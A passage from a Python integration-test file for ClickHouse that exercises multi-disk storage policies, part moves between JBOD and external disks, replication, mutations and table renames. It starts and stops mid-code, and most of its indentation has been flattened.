"move_factor": 0.1,
},
{
"policy_name": "default_disk_with_external",
"volume_name": "big",
"volume_priority": "2",
"disks": ["external"],
"max_data_part_size": "20971520",
"move_factor": 0.1,
},
{
"policy_name": "special_warning_policy",
"volume_name": "special_warning_zero_volume",
"volume_priority": "1",
"disks": ["default"],
"max_data_part_size": "0",
"move_factor": 0.1,
},
{
"policy_name": "special_warning_policy",
"volume_name": "special_warning_default_volume",
"volume_priority": "2",
"disks": ["external"],
"max_data_part_size": "0",
"move_factor": 0.1,
},
{
"policy_name": "special_warning_policy",
"volume_name": "special_warning_small_volume",
"volume_priority": "3",
"disks": ["jbod1"],
"max_data_part_size": "1024",
"move_factor": 0.1,
},
{
"policy_name": "special_warning_policy",
"volume_name": "special_warning_big_volume",
"volume_priority": "4",
"disks": ["jbod2"],
"max_data_part_size": "1024000000",
"move_factor": 0.1,
},
]
clickhouse_policies_data = json.loads(node1.query("SELECT * FROM system.storage_policies WHERE policy_name != 'default' FORMAT JSON"))["data"]
def key(x):
return (x["policy_name"], x["volume_name"], x["volume_priority"])
assert sorted(clickhouse_policies_data, key=key) == sorted(expected_policies_data, key=key)
def test_query_parser(start_cluster):
try:
with pytest.raises(QueryRuntimeException):
node1.query("""
CREATE TABLE table_with_absent_policy (
d UInt64
) ENGINE = MergeTree()
ORDER BY d
SETTINGS storage_policy='very_exciting_policy'
""")
with pytest.raises(QueryRuntimeException):
node1.query("""
CREATE TABLE table_with_absent_policy (
d UInt64
) ENGINE = MergeTree()
ORDER BY d
SETTINGS storage_policy='jbod1'
""")
node1.query("""
CREATE TABLE table_with_normal_policy (
d UInt64
) ENGINE = MergeTree()
ORDER BY d
SETTINGS storage_policy='default'
""")
node1.query("INSERT INTO table_with_normal_policy VALUES (5)")
with pytest.raises(QueryRuntimeException):
node1.query("ALTER TABLE table_with_normal_policy MOVE PARTITION 'all' TO VOLUME 'some_volume'")
with pytest.raises(QueryRuntimeException):
node1.query("ALTER TABLE table_with_normal_policy MOVE PARTITION 'all' TO DISK 'some_volume'")
with pytest.raises(QueryRuntimeException):
node1.query("ALTER TABLE table_with_normal_policy MOVE PART 'xxxxx' TO DISK 'jbod1'")
with pytest.raises(QueryRuntimeException):
node1.query("ALTER TABLE table_with_normal_policy MOVE PARTITION 'yyyy' TO DISK 'jbod1'")
with pytest.raises(QueryRuntimeException):
node1.query("ALTER TABLE table_with_normal_policy MODIFY SETTING storage_policy='moving_jbod_with_external'")
finally:
node1.query("DROP TABLE IF EXISTS table_with_normal_policy")
@pytest.mark.parametrize("name,engine", [
("test_alter_policy","MergeTree()"),
("replicated_test_alter_policy","ReplicatedMergeTree('/clickhouse/test_alter_policy', '1')",),
])
def test_alter_policy(start_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
d UInt64
) ENGINE = {engine}
ORDER BY d
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
assert node1.query("""SELECT storage_policy FROM system.tables WHERE name = '{name}'""".format(name=name)) == "small_jbod_with_external\n"
with pytest.raises(QueryRuntimeException):
node1.query("""ALTER TABLE {name} MODIFY SETTING storage_policy='one_more_small_jbod_with_external'""".format(name=name))
assert node1.query("""SELECT storage_policy FROM system.tables WHERE name = '{name}'""".format(name=name)) == "small_jbod_with_external\n"
node1.query("""ALTER TABLE {name} MODIFY SETTING storage_policy='jbods_with_external'""".format(name=name))
assert node1.query("""SELECT storage_policy FROM system.tables WHERE name = '{name}'""".format(name=name)) == "jbods_with_external\n"
with pytest.raises(QueryRuntimeException):
node1.query("""ALTER TABLE {name} MODIFY SETTING storage_policy='small_jbod_with_external'""".format(name=name))
assert node1.query("""SELECT storage_policy FROM system.tables WHERE name = '{name}'""".format(name=name)) == "jbods_with_external\n"
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
def get_random_string(length):
return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(length))
def get_used_disks_for_table(node, table_name):
return node.query("select disk_name from system.parts where table == '{}' and active=1 order by modification_time".format(table_name)).strip().split('\n')
def test_no_warning_about_zero_max_data_part_size(start_cluster):
def get_log(node):
return node.exec_in_container(["bash", "-c", "cat /var/log/clickhouse-server/clickhouse-server.log"])
for node in (node1, node2):
node.query("""
CREATE TABLE default.test_warning_table (
s String
) ENGINE = MergeTree
ORDER BY tuple()
SETTINGS storage_policy='small_jbod_with_external'
""")
node.query("""
DROP TABLE default.test_warning_table
""")
log = get_log(node)
assert not re.search("Warning.*Volume.*special_warning_zero_volume", log)
assert not re.search("Warning.*Volume.*special_warning_default_volume", log)
assert re.search("Warning.*Volume.*special_warning_small_volume", log)
assert not re.search("Warning.*Volume.*special_warning_big_volume", log)
@pytest.mark.parametrize("name,engine", [
("mt_on_jbod","MergeTree()"),
("replicated_mt_on_jbod","ReplicatedMergeTree('/clickhouse/replicated_mt_on_jbod', '1')",),
])
def test_round_robin(start_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
d UInt64
) ENGINE = {engine}
ORDER BY d
SETTINGS storage_policy='jbods_with_external'
""".format(name=name, engine=engine))
# first should go to the jbod1
node1.query("insert into {} select * from numbers(10000)".format(name))
used_disk = get_used_disks_for_table(node1, name)
assert len(used_disk) == 1, 'More than one disk used for single insert'
node1.query("insert into {} select * from numbers(10000, 10000)".format(name))
used_disks = get_used_disks_for_table(node1, name)
assert len(used_disks) == 2, 'Two disks should be used for two parts'
assert used_disks[0] != used_disks[1], "Should write to different disks"
node1.query("insert into {} select * from numbers(20000, 10000)".format(name))
used_disks = get_used_disks_for_table(node1, name)
# jbod1 -> jbod2 -> jbod1 -> jbod2 ... etc
assert len(used_disks) == 3
assert used_disks[0] != used_disks[1]
assert used_disks[2] == used_disks[0]
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.parametrize("name,engine", [
("mt_with_huge_part","MergeTree()"),
("replicated_mt_with_huge_part","ReplicatedMergeTree('/clickhouse/replicated_mt_with_huge_part', '1')",),
])
def test_max_data_part_size(start_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
s1 String
) ENGINE = {engine}
ORDER BY tuple()
SETTINGS storage_policy='jbods_with_external'
""".format(name=name, engine=engine))
data = [] # 10MB in total
for i in range(10):
data.append(get_random_string(1024 * 1024)) # 1MB row
node1.query("INSERT INTO {} VALUES {}".format(name, ','.join(["('" + x + "')" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert len(used_disks) == 1
assert used_disks[0] == 'external'
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine", [
("mt_with_overflow","MergeTree()"),
("replicated_mt_with_overflow","ReplicatedMergeTree('/clickhouse/replicated_mt_with_overflow', '1')",),
])
def test_jbod_overflow(start_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
s1 String
) ENGINE = {engine}
ORDER BY tuple()
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
node1.query("SYSTEM STOP MERGES")
# small jbod size is 40MB, so let's insert a 5MB batch 7 times
for i in range(7):
data = [] # 5MB in total
for i in range(5):
data.append(get_random_string(1024 * 1024)) # 1MB row
node1.query("INSERT INTO {} VALUES {}".format(name, ','.join(["('" + x + "')" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert all(disk == 'jbod1' for disk in used_disks)
# should go to the external disk (jbod is overflown)
data = [] # 10MB in total
for i in range(10):
data.append(get_random_string(1024 * 1024)) # 1MB row
node1.query("INSERT INTO {} VALUES {}".format(name, ','.join(["('" + x + "')" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert used_disks[-1] == 'external'
node1.query("SYSTEM START MERGES")
time.sleep(1)
node1.query("OPTIMIZE TABLE {} FINAL".format(name))
time.sleep(2)
disks_for_merges = node1.query("SELECT disk_name FROM system.parts WHERE table == '{}' AND level >= 1 and active = 1 ORDER BY modification_time".format(name)).strip().split('\n')
assert all(disk == 'external' for disk in disks_for_merges)
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.parametrize("name,engine", [
("moving_mt","MergeTree()"),
("moving_replicated_mt","ReplicatedMergeTree('/clickhouse/moving_replicated_mt', '1')",),
])
def test_background_move(start_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
s1 String
) ENGINE = {engine}
ORDER BY tuple()
SETTINGS storage_policy='moving_jbod_with_external'
""".format(name=name, engine=engine))
for i in range(5):
data = [] # 5MB in total
for i in range(5):
data.append(get_random_string(1024 * 1024)) # 1MB row
# small jbod size is 40MB, so let's insert a 5MB batch 5 times
node1.query("INSERT INTO {} VALUES {}".format(name, ','.join(["('" + x + "')" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
retry = 20
i = 0
while sum(1 for x in used_disks if x == 'jbod1') > 2 and i < retry:
time.sleep(0.5)
used_disks = get_used_disks_for_table(node1, name)
i += 1
assert sum(1 for x in used_disks if x == 'jbod1') <= 2
# first (oldest) part was moved to external
assert used_disks[0] == 'external'
path = node1.query("SELECT path_on_disk FROM system.part_log WHERE table = '{}' AND event_type='MovePart' ORDER BY event_time LIMIT 1".format(name))
# first (oldest) part was moved to external
assert path.startswith("/external")
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine", [
("stopped_moving_mt","MergeTree()"),
("stopped_moving_replicated_mt","ReplicatedMergeTree('/clickhouse/stopped_moving_replicated_mt', '1')",),
])
def test_start_stop_moves(start_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
s1 String
) ENGINE = {engine}
ORDER BY tuple()
SETTINGS storage_policy='moving_jbod_with_external'
""".format(name=name, engine=engine))
node1.query("INSERT INTO {} VALUES ('HELLO')".format(name))
node1.query("INSERT INTO {} VALUES ('WORLD')".format(name))
used_disks = get_used_disks_for_table(node1, name)
assert all(d == "jbod1" for d in used_disks), "All writes shoud go to jbods"
first_part = node1.query("SELECT name FROM system.parts WHERE table = '{}' and active = 1 ORDER BY modification_time LIMIT 1".format(name)).strip()
node1.query("SYSTEM STOP MOVES")
with pytest.raises(QueryRuntimeException):
node1.query("ALTER TABLE {} MOVE PART '{}' TO VOLUME 'external'".format(name, first_part))
used_disks = get_used_disks_for_table(node1, name)
assert all(d == "jbod1" for d in used_disks), "Blocked moves doesn't actually move something"
node1.query("SYSTEM START MOVES")
node1.query("ALTER TABLE {} MOVE PART '{}' TO VOLUME 'external'".format(name, first_part))
disk = node1.query("SELECT disk_name FROM system.parts WHERE table = '{}' and name = '{}' and active = 1".format(name, first_part)).strip()
assert disk == "external"
node1.query("TRUNCATE TABLE {}".format(name))
node1.query("SYSTEM STOP MOVES {}".format(name))
node1.query("SYSTEM STOP MERGES {}".format(name))
for i in range(5):
data = [] # 5MB in total
for i in range(5):
data.append(get_random_string(1024 * 1024)) # 1MB row
# jbod size is 40MB, so let's insert a 5MB batch 5 times
node1.query("INSERT INTO {} VALUES {}".format(name, ','.join(["('" + x + "')" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
retry = 5
i = 0
while sum(1 for x in used_disks if x == 'jbod1') > 2 and i < retry:
time.sleep(0.1)
used_disks = get_used_disks_for_table(node1, name)
i += 1
# first (oldest) part doesn't move anywhere
assert used_disks[0] == 'jbod1'
node1.query("SYSTEM START MOVES {}".format(name))
node1.query("SYSTEM START MERGES {}".format(name))
# wait sometime until background backoff finishes
retry = 30
i = 0
while sum(1 for x in used_disks if x == 'jbod1') > 2 and i < retry:
time.sleep(1)
used_disks = get_used_disks_for_table(node1, name)
i += 1
assert sum(1 for x in used_disks if x == 'jbod1') <= 2
# first (oldest) part moved to external
assert used_disks[0] == 'external'
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
def get_path_for_part_from_part_log(node, table, part_name):
node.query("SYSTEM FLUSH LOGS")
path = node.query("SELECT path_on_disk FROM system.part_log WHERE table = '{}' and part_name = '{}' ORDER BY event_time DESC LIMIT 1".format(table, part_name))
return path.strip()
def get_paths_for_partition_from_part_log(node, table, partition_id):
node.query("SYSTEM FLUSH LOGS")
paths = node.query("SELECT path_on_disk FROM system.part_log WHERE table = '{}' and partition_id = '{}' ORDER BY event_time DESC".format(table, partition_id))
return paths.strip().split('\n')
@pytest.mark.parametrize("name,engine", [
("altering_mt","MergeTree()"),
#("altering_replicated_mt","ReplicatedMergeTree('/clickhouse/altering_replicated_mt', '1')",),
# SYSTEM STOP MERGES doesn't disable merge assignments
])
def test_alter_move(start_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
EventDate Date,
number UInt64
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY toYYYYMM(EventDate)
SETTINGS storage_policy='jbods_with_external'
""".format(name=name, engine=engine))
node1.query("SYSTEM STOP MERGES {}".format(name)) # to avoid conflicts
node1.query("INSERT INTO {} VALUES(toDate('2019-03-15'), 65)".format(name))
node1.query("INSERT INTO {} VALUES(toDate('2019-03-16'), 66)".format(name))
node1.query("INSERT INTO {} VALUES(toDate('2019-04-10'), 42)".format(name))
node1.query("INSERT INTO {} VALUES(toDate('2019-04-11'), 43)".format(name))
used_disks = get_used_disks_for_table(node1, name)
assert all(d.startswith("jbod") for d in used_disks), "All writes should go to jbods"
first_part = node1.query("SELECT name FROM system.parts WHERE table = '{}' and active = 1 ORDER BY modification_time LIMIT 1".format(name)).strip()
time.sleep(1)
node1.query("ALTER TABLE {} MOVE PART '{}' TO VOLUME 'external'".format(name, first_part))
disk = node1.query("SELECT disk_name FROM system.parts WHERE table = '{}' and name = '{}' and active = 1".format(name, first_part)).strip()
assert disk == 'external'
assert get_path_for_part_from_part_log(node1, name, first_part).startswith("/external")
time.sleep(1)
node1.query("ALTER TABLE {} MOVE PART '{}' TO DISK 'jbod1'".format(name, first_part))
disk = node1.query("SELECT disk_name FROM system.parts WHERE table = '{}' and name = '{}' and active = 1".format(name, first_part)).strip()
assert disk == 'jbod1'
assert get_path_for_part_from_part_log(node1, name, first_part).startswith("/jbod1")
time.sleep(1)
node1.query("ALTER TABLE {} MOVE PARTITION 201904 TO VOLUME 'external'".format(name))
disks = node1.query("SELECT disk_name FROM system.parts WHERE table = '{}' and partition = '201904' and active = 1".format(name)).strip().split('\n')
assert len(disks) == 2
assert all(d == "external" for d in disks)
assert all(path.startswith("/external") for path in get_paths_for_partition_from_part_log(node1, name, '201904')[:2])
time.sleep(1)
node1.query("ALTER TABLE {} MOVE PARTITION 201904 TO DISK 'jbod2'".format(name))
disks = node1.query("SELECT disk_name FROM system.parts WHERE table = '{}' and partition = '201904' and active = 1".format(name)).strip().split('\n')
assert len(disks) == 2
assert all(d == "jbod2" for d in disks)
assert all(path.startswith("/jbod2") for path in get_paths_for_partition_from_part_log(node1, name, '201904')[:2])
assert node1.query("SELECT COUNT() FROM {}".format(name)) == "4\n"
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
@pytest.mark.parametrize("volume_or_disk", [
"DISK",
"VOLUME"
])
def test_alter_move_half_of_partition(start_cluster, volume_or_disk):
name = "alter_move_half_of_partition"
engine = "MergeTree()"
try:
node1.query("""
CREATE TABLE {name} (
EventDate Date,
number UInt64
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY toYYYYMM(EventDate)
SETTINGS storage_policy='jbods_with_external'
""".format(name=name, engine=engine))
node1.query("SYSTEM STOP MERGES {}".format(name))
node1.query("INSERT INTO {} VALUES(toDate('2019-03-15'), 65)".format(name))
node1.query("INSERT INTO {} VALUES(toDate('2019-03-16'), 42)".format(name))
used_disks = get_used_disks_for_table(node1, name)
assert all(d.startswith("jbod") for d in used_disks), "All writes should go to jbods"
time.sleep(1)
parts = node1.query("SELECT name FROM system.parts WHERE table = '{}' and active = 1".format(name)).splitlines()
assert len(parts) == 2
node1.query("ALTER TABLE {} MOVE PART '{}' TO VOLUME 'external'".format(name, parts[0]))
disks = node1.query("SELECT disk_name FROM system.parts WHERE table = '{}' and name = '{}' and active = 1".format(name, parts[0])).splitlines()
assert disks == ["external"]
time.sleep(1)
node1.query("ALTER TABLE {} MOVE PARTITION 201903 TO {volume_or_disk} 'external'".format(name, volume_or_disk=volume_or_disk))
disks = node1.query("SELECT disk_name FROM system.parts WHERE table = '{}' and partition = '201903' and active = 1".format(name)).splitlines()
assert disks == ["external"]*2
assert node1.query("SELECT COUNT() FROM {}".format(name)) == "2\n"
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
@pytest.mark.parametrize("volume_or_disk", [
"DISK",
"VOLUME"
])
def test_alter_double_move_partition(start_cluster, volume_or_disk):
name = "alter_double_move_partition"
engine = "MergeTree()"
try:
node1.query("""
CREATE TABLE {name} (
EventDate Date,
number UInt64
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY toYYYYMM(EventDate)
SETTINGS storage_policy='jbods_with_external'
""".format(name=name, engine=engine))
node1.query("SYSTEM STOP MERGES {}".format(name))
node1.query("INSERT INTO {} VALUES(toDate('2019-03-15'), 65)".format(name))
node1.query("INSERT INTO {} VALUES(toDate('2019-03-16'), 42)".format(name))
used_disks = get_used_disks_for_table(node1, name)
assert all(d.startswith("jbod") for d in used_disks), "All writes should go to jbods"
time.sleep(1)
node1.query("ALTER TABLE {} MOVE PARTITION 201903 TO {volume_or_disk} 'external'".format(name, volume_or_disk=volume_or_disk))
disks = node1.query("SELECT disk_name FROM system.parts WHERE table = '{}' and partition = '201903' and active = 1".format(name)).splitlines()
assert disks == ["external"]*2
assert node1.query("SELECT COUNT() FROM {}".format(name)) == "2\n"
time.sleep(1)
with pytest.raises(QueryRuntimeException):
node1.query("ALTER TABLE {} MOVE PARTITION 201903 TO {volume_or_disk} 'external'".format(name, volume_or_disk=volume_or_disk))
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
def produce_alter_move(node, name):
move_type = random.choice(["PART", "PARTITION"])
if move_type == "PART":
for _ in range(10):
try:
parts = node1.query("SELECT name from system.parts where table = '{}' and active = 1".format(name)).strip().split('\n')
break
except QueryRuntimeException:
pass
else:
raise Exception("Cannot select from system.parts")
move_part = random.choice(["'" + part + "'" for part in parts])
else:
move_part = random.choice([201903, 201904])
move_disk = random.choice(["DISK", "VOLUME"])
if move_disk == "DISK":
move_volume = random.choice(["'external'", "'jbod1'", "'jbod2'"])
else:
move_volume = random.choice(["'main'", "'external'"])
try:
    node.query("ALTER TABLE {} MOVE {mt} {mp} TO {md} {mv}".format(
        name, mt=move_type, mp=move_part, md=move_disk, mv=move_volume))
except QueryRuntimeException:
    pass  # concurrent moves may legitimately fail; ignore and continue
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine", [
("concurrently_altering_mt","MergeTree()"),
("concurrently_altering_replicated_mt","ReplicatedMergeTree('/clickhouse/concurrently_altering_replicated_mt', '1')",),
])
def test_concurrent_alter_move(start_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
EventDate Date,
number UInt64
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY toYYYYMM(EventDate)
SETTINGS storage_policy='jbods_with_external'
""".format(name=name, engine=engine))
values = list({ random.randint(1, 1000000) for _ in range(0, 1000) })
def insert(num):
for i in range(num):
day = random.randint(11, 30)
value = values.pop()
month = '0' + str(random.choice([3, 4]))
node1.query("INSERT INTO {} VALUES(toDate('2019-{m}-{d}'), {v})".format(name, m=month, d=day, v=value))
def alter_move(num):
for i in range(num):
produce_alter_move(node1, name)
def alter_update(num):
for i in range(num):
node1.query("ALTER TABLE {} UPDATE number = number + 1 WHERE 1".format(name))
def optimize_table(num):
for i in range(num):
node1.query("OPTIMIZE TABLE {} FINAL".format(name))
p = Pool(15)
tasks = []
for i in range(5):
tasks.append(p.apply_async(insert, (100,)))
tasks.append(p.apply_async(alter_move, (100,)))
tasks.append(p.apply_async(alter_update, (100,)))
tasks.append(p.apply_async(optimize_table, (100,)))
for task in tasks:
task.get(timeout=120)
assert node1.query("SELECT 1") == "1\n"
assert node1.query("SELECT COUNT() FROM {}".format(name)) == "500\n"
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine", [
("concurrently_dropping_mt","MergeTree()"),
("concurrently_dropping_replicated_mt","ReplicatedMergeTree('/clickhouse/concurrently_dropping_replicated_mt', '1')",),
])
def test_concurrent_alter_move_and_drop(start_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
EventDate Date,
number UInt64
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY toYYYYMM(EventDate)
SETTINGS storage_policy='jbods_with_external'
""".format(name=name, engine=engine))
values = list({ random.randint(1, 1000000) for _ in range(0, 1000) })
def insert(num):
for i in range(num):
day = random.randint(11, 30)
value = values.pop()
month = '0' + str(random.choice([3, 4]))
node1.query("INSERT INTO {} VALUES(toDate('2019-{m}-{d}'), {v})".format(name, m=month, d=day, v=value))
def alter_move(num):
for i in range(num):
produce_alter_move(node1, name)
def alter_drop(num):
for i in range(num):
partition = random.choice([201903, 201904])
action = random.choice(["drop", "detach"])
node1.query("ALTER TABLE {} {} PARTITION {}".format(name, action, partition))
insert(100)
p = Pool(15)
tasks = []
for i in range(5):
tasks.append(p.apply_async(insert, (100,)))
tasks.append(p.apply_async(alter_move, (100,)))
tasks.append(p.apply_async(alter_drop, (100,)))
for task in tasks:
task.get(timeout=60)
assert node1.query("SELECT 1") == "1\n"
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
@pytest.mark.parametrize("name,engine", [
("detach_attach_mt","MergeTree()"),
("replicated_detach_attach_mt","ReplicatedMergeTree('/clickhouse/replicated_detach_attach_mt', '1')",),
])
def test_detach_attach(start_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
s1 String
) ENGINE = {engine}
ORDER BY tuple()
SETTINGS storage_policy='moving_jbod_with_external'
""".format(name=name, engine=engine))
data = [] # 5MB in total
for i in range(5):
data.append(get_random_string(1024 * 1024)) # 1MB row
node1.query("INSERT INTO {} VALUES {}".format(name, ','.join(["('" + x + "')" for x in data])))
node1.query("ALTER TABLE {} DETACH PARTITION tuple()".format(name))
assert node1.query("SELECT count() FROM {}".format(name)).strip() == "0"
assert node1.query("SELECT disk FROM system.detached_parts WHERE table = '{}'".format(name)).strip() == "jbod1"
node1.query("ALTER TABLE {} ATTACH PARTITION tuple()".format(name))
assert node1.query("SELECT count() FROM {}".format(name)).strip() == "5"
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
@pytest.mark.parametrize("name,engine", [
("mutating_mt","MergeTree()"),
("replicated_mutating_mt","ReplicatedMergeTree('/clickhouse/replicated_mutating_mt', '1')",),
])
def test_mutate_to_another_disk(start_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
s1 String
) ENGINE = {engine}
ORDER BY tuple()
SETTINGS storage_policy='moving_jbod_with_external'
""".format(name=name, engine=engine))
for i in range(5):
data = [] # 5MB in total
for i in range(5):
data.append(get_random_string(1024 * 1024)) # 1MB row
node1.query("INSERT INTO {} VALUES {}".format(name, ','.join(["('" + x + "')" for x in data])))
node1.query("ALTER TABLE {} UPDATE s1 = concat(s1, 'x') WHERE 1".format(name))
retry = 20
while node1.query("SELECT * FROM system.mutations WHERE is_done = 0") != "" and retry > 0:
retry -= 1
time.sleep(0.5)
if node1.query("SELECT latest_fail_reason FROM system.mutations WHERE table = '{}'".format(name)) == "":
assert node1.query("SELECT sum(endsWith(s1, 'x')) FROM {}".format(name)) == "25\n"
else: # mutation failed, let's try on another disk
print "Mutation failed"
node1.query("OPTIMIZE TABLE {} FINAL".format(name))
node1.query("ALTER TABLE {} UPDATE s1 = concat(s1, 'x') WHERE 1".format(name))
retry = 20
while node1.query("SELECT * FROM system.mutations WHERE is_done = 0") != "" and retry > 0:
retry -= 1
time.sleep(0.5)
assert node1.query("SELECT sum(endsWith(s1, 'x')) FROM {}".format(name)) == "25\n"
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine", [
("alter_modifying_mt","MergeTree()"),
("replicated_alter_modifying_mt","ReplicatedMergeTree('/clickhouse/replicated_alter_modifying_mt', '1')",),
])
def test_concurrent_alter_modify(start_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
EventDate Date,
number UInt64
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY toYYYYMM(EventDate)
SETTINGS storage_policy='jbods_with_external'
""".format(name=name, engine=engine))
values = list({ random.randint(1, 1000000) for _ in range(0, 1000) })
def insert(num):
for i in range(num):
day = random.randint(11, 30)
value = values.pop()
month = '0' + str(random.choice([3, 4]))
node1.query("INSERT INTO {} VALUES(toDate('2019-{m}-{d}'), {v})".format(name, m=month, d=day, v=value))
def alter_move(num):
for i in range(num):
produce_alter_move(node1, name)
def alter_modify(num):
for i in range(num):
column_type = random.choice(["UInt64", "String"])
node1.query("ALTER TABLE {} MODIFY COLUMN number {}".format(name, column_type))
insert(100)
assert node1.query("SELECT COUNT() FROM {}".format(name)) == "100\n"
p = Pool(50)
tasks = []
for i in range(5):
tasks.append(p.apply_async(alter_move, (100,)))
tasks.append(p.apply_async(alter_modify, (100,)))
for task in tasks:
task.get(timeout=120)
assert node1.query("SELECT 1") == "1\n"
assert node1.query("SELECT COUNT() FROM {}".format(name)) == "100\n"
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
def test_simple_replication_and_moves(start_cluster):
try:
for i, node in enumerate([node1, node2]):
node.query("""
CREATE TABLE replicated_table_for_moves (
s1 String
) ENGINE = ReplicatedMergeTree('/clickhouse/replicated_table_for_moves', '{}')
ORDER BY tuple()
SETTINGS storage_policy='moving_jbod_with_external', old_parts_lifetime=1, cleanup_delay_period=1, cleanup_delay_period_random_add=2
""".format(i + 1))
def insert(num):
for i in range(num):
node = random.choice([node1, node2])
data = [] # 1MB in total
for i in range(2):
data.append(get_random_string(512 * 1024)) # 500KB value
node.query("INSERT INTO replicated_table_for_moves VALUES {}".format(','.join(["('" + x + "')" for x in data])))
def optimize(num):
for i in range(num):
node = random.choice([node1, node2])
node.query("OPTIMIZE TABLE replicated_table_for_moves FINAL")
p = Pool(60)
tasks = []
tasks.append(p.apply_async(insert, (20,)))
tasks.append(p.apply_async(optimize, (20,)))
for task in tasks:
task.get(timeout=60)
node1.query("SYSTEM SYNC REPLICA replicated_table_for_moves", timeout=5)
node2.query("SYSTEM SYNC REPLICA replicated_table_for_moves", timeout=5)
node1.query("SELECT COUNT() FROM replicated_table_for_moves") == "40\n"
node2.query("SELECT COUNT() FROM replicated_table_for_moves") == "40\n"
data = [] # 1MB in total
for i in range(2):
data.append(get_random_string(512 * 1024)) # 500KB value
time.sleep(3) # wait until old parts will be deleted
node1.query("SYSTEM STOP MERGES")
node2.query("SYSTEM STOP MERGES")
node1.query("INSERT INTO replicated_table_for_moves VALUES {}".format(','.join(["('" + x + "')" for x in data])))
node2.query("INSERT INTO replicated_table_for_moves VALUES {}".format(','.join(["('" + x + "')" for x in data])))
time.sleep(3) # nothing was moved
disks1 = get_used_disks_for_table(node1, "replicated_table_for_moves")
disks2 = get_used_disks_for_table(node2, "replicated_table_for_moves")
node1.query("SYSTEM START MERGES")
node2.query("SYSTEM START MERGES")
assert set(disks1) == set(["jbod1", "external"])
assert set(disks2) == set(["jbod1", "external"])
finally:
for node in [node1, node2]:
node.query("DROP TABLE IF EXISTS replicated_table_for_moves")
def test_download_appropriate_disk(start_cluster):
try:
for i, node in enumerate([node1, node2]):
node.query("""
CREATE TABLE replicated_table_for_download (
s1 String
) ENGINE = ReplicatedMergeTree('/clickhouse/replicated_table_for_download', '{}')
ORDER BY tuple()
SETTINGS storage_policy='moving_jbod_with_external', old_parts_lifetime=1, cleanup_delay_period=1, cleanup_delay_period_random_add=2
""".format(i + 1))
data = []
for i in range(50):
data.append(get_random_string(1024 * 1024)) # 1MB value
node1.query("INSERT INTO replicated_table_for_download VALUES {}".format(','.join(["('" + x + "')" for x in data])))
for _ in range(10):
try:
print "Syncing replica"
node2.query("SYSTEM SYNC REPLICA replicated_table_for_download")
break
except:
time.sleep(0.5)
disks2 = get_used_disks_for_table(node2, "replicated_table_for_download")
assert set(disks2) == set(["external"])
finally:
for node in [node1, node2]:
node.query("DROP TABLE IF EXISTS replicated_table_for_download")
def test_rename(start_cluster):
try:
node1.query("""
CREATE TABLE default.renaming_table (
s String
) ENGINE = MergeTree
ORDER BY tuple()
SETTINGS storage_policy='small_jbod_with_external'
""")
for _ in range(5):
data = []
for i in range(10):
data.append(get_random_string(1024 * 1024)) # 1MB value
node1.query("INSERT INTO renaming_table VALUES {}".format(','.join(["('" + x + "')" for x in data])))
disks = get_used_disks_for_table(node1, "renaming_table")
assert len(disks) > 1
assert node1.query("SELECT COUNT() FROM default.renaming_table") == "50\n"
node1.query("RENAME TABLE default.renaming_table TO default.renaming_table1")
assert node1.query("SELECT COUNT() FROM default.renaming_table1") == "50\n"
with pytest.raises(QueryRuntimeException):
node1.query("SELECT COUNT() FROM default.renaming_table")
node1.query("CREATE DATABASE IF NOT EXISTS test")
node1.query("RENAME TABLE default.renaming_table1 TO test.renaming_table2")
assert node1.query("SELECT COUNT() FROM test.renaming_table2") == "50\n"
with pytest.raises(QueryRuntimeException):
node1.query("SELECT COUNT() FROM default.renaming_table1")
finally:
node1.query("DROP TABLE IF EXISTS default.renaming_table")
node1.query("DROP TABLE IF EXISTS default.renaming_table1")
node1.query("DROP TABLE IF EXISTS test.renaming_table2")
def test_freeze(start_cluster):
try:
node1.query("""
CREATE TABLE default.freezing_table (
d Date,
s String
) ENGINE = MergeTree
ORDER BY tuple()
